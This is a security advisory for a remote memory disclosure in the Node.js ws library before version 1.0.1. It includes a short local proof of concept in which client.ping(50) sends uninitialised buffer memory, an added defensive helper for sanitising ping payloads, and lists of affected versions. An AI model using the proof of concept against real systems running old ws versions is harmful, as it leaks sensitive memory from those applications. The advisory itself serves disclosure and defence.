ws

Remote Memory Disclosure

Severity: low

Overview

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // pong payload: the server echoes back the bytes the client sent in the ping
  })
})

Remediation

Update to version 1.0.1 or greater.
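
An application-side guard for the case described in the overview, as an added example that is not part of the advisory or of ws: it normalises user-controlled ping data so that a number is sent as text and can never be read as a buffer length. The helper toPingPayload and the sample inputs are hypothetical; treating the numeric argument as the trigger is an assumption based on the proof of concept's client.ping(50), and the 125-byte limit is the control-frame payload limit from RFC 6455.

```javascript
'use strict'

// RFC 6455 section 5.5: control frames (ping/pong/close) carry at most 125 bytes.
var MAX_CONTROL_PAYLOAD = 125

// Hypothetical helper (not part of ws): turn untrusted input into a ping payload
// whose bytes are fully determined by that input.
function toPingPayload (input) {
  if (input === undefined || input === null) return Buffer.alloc(0)

  // Assumption: a number is the dangerous case (the PoC calls client.ping(50)).
  // Send its decimal digits as text so it can never act as an allocation size.
  if (typeof input === 'number') {
    if (!Number.isFinite(input)) throw new TypeError('ping payload number must be finite')
    input = String(input)
  }

  var payload
  if (typeof input === 'string') {
    payload = Buffer.from(input, 'utf8') // every byte is written from the string
  } else if (Buffer.isBuffer(input)) {
    payload = Buffer.from(input) // copy, so later changes by the caller are not sent
  } else {
    throw new TypeError('ping payload must be a string, number or Buffer')
  }

  if (payload.length > MAX_CONTROL_PAYLOAD) {
    throw new RangeError('ping payload exceeds ' + MAX_CONTROL_PAYLOAD + ' bytes')
  }
  return payload
}

// Constructed sample inputs, as a request handler might receive them.
function describeSamples () {
  var samples = [50, 'keepalive', Buffer.from([1, 2, 3]), { length: 50 }, 'x'.repeat(200)]
  return samples.map(function (sample) {
    try {
      return 'ok:' + toPingPayload(sample).toString('hex')
    } catch (err) {
      return 'rejected:' + err.name
    }
  })
}

console.log(describeSamples())
// In the application: client.ping(toPingPayload(userValue))
```

This guard complements the upgrade above; it does not replace it.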

Vulnerable versions

0.2.6 (7 years ago)
0.2.7 (7 years ago)
0.2.8 (7 years ago)
0.2.9 (7 years ago)
0.3.0 (7 years ago)
0.3.1 (7 years ago)
0.3.2 (7 years ago)
0.3.3 (7 years ago)
0.3.4 (7 years ago)
0.3.5 (7 years ago)
0.3.6 (7 years ago)
0.3.7 (7 years ago)
0.3.8 (7 years ago)
0.3.9 (7 years ago)
0.4.0 (7 years ago)
0.4.1 (7 years ago)
0.4.2 (7 years ago)
0.4.3 (7 years ago)
0.4.4 (7 years ago)
0.4.5 (7 years ago)
0.4.6 (7 years ago)
0.4.7 (6 years ago)
0.4.8 (6 years ago)
0.4.9 (6 years ago)
0.4.10 (6 years ago)
0.4.11 (6 years ago)
0.4.12 (6 years ago)
0.4.13 (6 years ago)
0.4.14 (6 years ago)
0.4.15 (6 years ago)
0.4.16 (6 years ago)
0.4.17 (6 years ago)
0.4.18 (6 years ago)
0.4.19 (6 years ago)
0.4.20 (6 years ago)
0.4.21 (6 years ago)
0.4.22 (6 years ago)
0.4.23 (6 years ago)
0.4.24 (6 years ago)
0.4.25 (6 years ago)
0.4.27 (5 years ago)
0.4.28 (5 years ago)
0.4.29 (5 years ago)
0.4.30 (5 years ago)
0.4.31 (5 years ago)
0.4.32 (4 years ago)
0.5.0 (4 years ago)
0.6.0 (4 years ago)
0.6.1 (4 years ago)
0.6.2 (4 years ago)
0.6.3 (4 years ago)
0.6.4 (4 years ago)
0.6.5 (4 years ago)
0.7.0 (4 years ago)
0.7.1 (4 years ago)
0.7.2 (3 years ago)
0.8.0 (3 years ago)
0.8.1 (3 years ago)
1.0.0 (3 years ago)

Unaffected versions

0.3.4-2 (7 years ago)
0.3.5-2 (7 years ago)
0.3.5-3 (7 years ago)
0.3.5-4 (7 years ago)
1.0.1 (3 years ago)
1.1.0 (2 years ago)
1.1.1 (2 years ago)
2.0.0-beta.0 (2 years ago)
2.0.0-beta.1 (2 years ago)
2.0.0-beta.2 (2 years ago)
2.0.0 (2 years ago)
2.0.1 (2 years ago)
2.0.2 (2 years ago)
2.0.3 (2 years ago)
1.1.2 (2 years ago)
2.1.0 (a year ago)
2.2.0 (a year ago)
1.1.3 (a year ago)
1.1.4 (a year ago)
2.2.1 (a year ago)
2.2.2 (a year ago)
2.2.3 (a year ago)
2.3.0 (a year ago)
2.3.1 (a year ago)
3.0.0 (a year ago)
3.1.0 (a year ago)
3.2.0 (a year ago)
3.3.0 (9 months ago)
1.1.5 (9 months ago)
3.3.1 (9 months ago)
3.3.2 (9 months ago)
3.3.3 (8 months ago)
4.0.0 (7 months ago)
4.1.0 (6 months ago)
5.0.0 (5 months ago)
5.1.0 (5 months ago)
5.1.1 (4 months ago)
5.2.0 (3 months ago)
5.2.1 (2 months ago)
5.2.2 (a month ago)
6.0.0 (25 days ago)

Advisory timeline

  1. Published

    Advisory published
    Jan 4th, 2016
  2. Reported

    Initial report by Feross Aboukhadijeh / Mathias Buss
    Jan 4th, 2016